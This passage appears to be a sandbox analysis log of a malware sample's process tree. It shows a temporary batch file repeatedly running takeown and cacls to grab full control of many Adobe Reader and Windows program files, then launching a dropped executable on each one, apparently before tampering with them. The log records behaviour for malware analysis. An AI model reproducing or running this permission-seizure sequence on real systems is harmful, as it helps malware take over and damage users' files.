- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  - Loads dropped DLL
  PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:224
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:784
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  - Loads dropped DLL
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  - Loads dropped DLL
  PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:1176
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1156
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1028
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  - Loads dropped DLL
  PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "device.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "device.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:792
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  - Loads dropped DLL
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1072
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""
  2⤵
  - Loads dropped DLL
  PID:876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:852
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2004
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui""
  2⤵
  PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui""
  2⤵
  PID:468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:336
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1392
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""
  2⤵
  PID:852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Music.jtp" -nobanner
    3⤵
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Music.jtp" -nobanner
      4⤵
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui""
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:236
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:228
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:884
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:1072
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:1812
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1152
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:300
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:796
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:1672
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\takeown.exe
